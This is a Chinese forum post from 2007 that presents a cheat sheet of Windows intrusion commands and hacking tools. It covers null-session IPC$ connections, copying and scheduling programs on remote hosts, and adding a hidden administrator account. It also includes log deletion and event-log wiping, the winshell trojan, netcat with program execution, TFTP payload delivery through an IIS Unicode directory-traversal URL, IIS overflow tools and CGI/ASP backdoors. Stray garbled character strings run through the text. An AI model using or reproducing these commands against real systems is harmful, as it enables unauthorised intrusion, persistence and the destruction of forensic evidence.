找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 720|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" 3 W& h: J/ w) t   以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" ) @+ ]! U+ z' E   传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ 8 F& T0 _4 J9 q% b D) e   查看远程主机时间 net time \IP地址 ) {. y, {7 Y' M$ ~' t   定时启动某个程序 at \IP地址 02:18 readme.exe 7 Z& J6 m! U- Z   查看共享 net view \IP地址 ; W2 t) }# B. S k8 M  查看netbios工作组列表 nBTstat -A IP地址 * H6 }( G( W# p" ~   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" 2 S* e* M) E* |4 X5 E$ i   这两条把自己增加到管理员组: net user 用户名 密码 /add ! T1 @7 |; Z, i' o0 Z* \  net locaLGroup Administrators 用户名 /add ) }# `8 ~. J! o' u; A& x  断开连接 net use \IP地址ipc$ /delete % I! b4 r6 A. H$ _0 R- J D ) \" [& _8 o4 j: a) `/ y  扫尾: 0 r7 ~4 x; `1 c   del C:winntsystem32logfiles*.* $ B# \( i& |& \" d8 R% @. g0 b6 S   del C:winntssytem32config*.evt ; K/ u$ \6 A/ H* I1 x   del C:winntsystem32dTCLog*.* 2 q# l& w$ I" @2 [% j/ b  del C:winntsystem32*.log K1 \9 U& Z8 H  del C:winntsystem32*.txt / T9 }' G& N# t8 }  del C:winnt*.txt , o) y7 a" W0 [   del C:winnt*.log - n7 H( U8 }( [" Q3 [ ) b) P6 {* k% h ^7 n/ U一、netsvc.exe 0 c7 d$ c/ [$ c3 z+ N% f; u  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: ) L4 T! }2 g8 D1 x" K0 `. E  netsvc /list \IP地址 0 j% E! I) ~/ y  netsvc schedule \IP地址 /query $ C. a {4 P" }. `   netsvc \IP地址 schedule /start : ]# B: U6 A' B& T7 f 3 J/ n6 w: g, v1 I& V% W% [5 J0 ^& L二、OpenTelnet.exe 4 W- F4 ?9 n6 Q+ p$ \   远程启动主机的Telnet服务,并绑定端口到7878,例如: ) c1 a6 e7 G8 o' T- t  OpenTelnet \IP地址 用户名 密码 1 7878 / Y& f8 S" u8 ? V' e, ]2 O9 g  然后就可以telnet到主机的7878端口,进入DOS方式下: / k0 Y: q s: v' L- F   telnet IP地址 7878 3 Y' x& {$ l0 t( Q) v: d6 Y. e; x7 S3 {+ x* b3 ^3 s 三、winshell.exe . d: ]1 ]( A5 c( M5 |6 q  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 7 V3 h0 `, ~) ^- E- `3 ]- R8 @/ l, G/ I  p Path (查看winshell主程序的路径信息) 8 @6 v0 |% u0 y$ p  b reBoot (重新启动机器) j4 Y4 v8 A S+ e, P   d shutDown (关闭机器) $ Q+ n0 B* P Q' X  s Shell (执行后你就会看到可爱的“C:>”) ) c( y: t$ h# `4 O U% x& A   x eXit (退出本次登录会话,此命令并不终止winshell的运行) # P! B; x4 e) A% V' j: p# q  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) : D* `( B% I! p. j3 x } 9 R' z) P& w6 E( w3 b四、3389登陆器,GUI方式登录远程主机的 , m5 O i q9 q% A, j$ x. h5 n* A) r ; ^; k$ O; Z& f5 Q五、elsave.exe , C. |* l8 J" l% l3 P" |  事件日志清除工具 / n# H/ _) }9 A* a6 I8 j   elsave -s \IP地址 -l "application" -C 0 s% u* W. X# F7 [   elsave -s \IP地址 -l "system" -C : j$ j2 _+ t7 K( S$ R- U9 p  elsave -s \IP地址 -l "security" -C ; N" Z% N h" j ~) a- `   执行后成功清除应用程序日志,系统日志,安全日志 ( Y( T, @9 C5 m. e- _( s) ^' _ 六、hbulot.exe 5 _/ x$ a. Z5 o2 y9 s0 p   开启win2kserver和winxp的3389服务 ! j/ a' x5 O, S% V8 ]/ g, @: d   hbulot (/r) ) u. e" m& V9 C) T$ T 4 |5 O6 ~- z! ]6 g# E) i( _; ^七、nc.exe(netcat.exe) 8 m, q+ J0 c% { E: M' c7 H  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 - v9 i7 V" C5 ?! s! L) J   想要连接到某处: nc (-options) hostname port(s)(ports) ... $ O0 _8 b. r; r9 z& M' e$ |4 U   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) 8 |' v* P I; m4 M7 P3 _( n1 I( @4 U9 m6 v) X6 m0 c' Q8 @ 参数: % P& t4 s1 b! f% K6 ]   -e prog 程序重定向,一旦连接,就执行 (危险!) ! G% \; ?; x9 @9 u) C6 r  -g gateway source-routing hop point(s), up to 8 - b/ W" |' ^ U+ I! K/ l3 H5 E) Q  -G num source-routing pointer: 4, 8, 12, ...+ y: E& @5 p4 }. C% O$ L) H+ _   -h 帮助信息 3 L/ o' N/ X6 n& R4 k& \4 [0 I   -i secs 延时的间隔 & A# G8 w1 W3 k7 K$ @4 K   -l 监听模式,用于入站连接 w* G; L! [) t/ G+ A2 g: F$ r   -n 指定数字的IP地址,不能用hostname ! ?: k, A W [1 [# H4 z   -o file 记录16进制的传输 6 {5 V$ O3 Q: [0 V3 A  -p port 本地端口号 9 y& N+ x5 ?% [% `  -r 任意指定本地及远程端口 5 I; S* \- V8 C% N   -s addr 本地源地址 : b7 Z2 ^8 @0 o a3 u8 B i   -u UDP模式 R1 I: ]/ b9 H) e+ |: j  -v 详细输出——用两个-v可得到更详细的内容 2 _0 w$ I" `9 l1 F* w1 F) y   -w secs timeout的时间 * b7 o. ~7 h7 t3 c   -z 将输入输出关掉——用于扫描时 $ c( q/ A) F0 ^0 A2 D " H6 t" J* d& E) j; ]八、TFTPD32.EXE ( z3 X6 s3 }0 m+ k, b6 g   把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: . s3 F& Q' T6 U5 h9 A2 v# m   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 . \: u% f7 ]4 W9 ^" @   然后可以直接令文件运行: + p8 `. H, I$ W7 G3 D8 c( M   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 : W! R6 Y; @) t 9 ?5 q7 R" D/ X- @' x% L九、prihack.exe是IIS的printer远程缓冲区溢出工具+ M' g" O1 P. g+ U; N   idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 & F0 i+ b$ M+ Z7 | w$ p7 V3 N( s' d6 {$ d Q5 V 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2025-1-19 03:17

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表